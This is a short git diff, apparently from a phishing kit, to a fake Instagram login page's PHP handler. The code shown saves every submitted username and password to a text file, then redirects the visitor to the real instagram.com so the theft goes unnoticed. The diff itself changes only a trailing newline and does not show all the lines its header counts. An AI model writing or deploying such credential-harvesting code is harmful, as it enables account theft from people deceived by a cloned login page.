diff --git a/.sites/instagram/login.php b/.sites/instagram/login.php index b7a4f4ef..b950ee6d 100644 --- a/.sites/instagram/login.php +++ b/.sites/instagram/login.php @@ -1,6 +1,22 @@ file_put_contents("usernames.txt", "Instagram Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND); header('Location: https://instagram.com'); exit(); -?> \ No newline at end of file +?>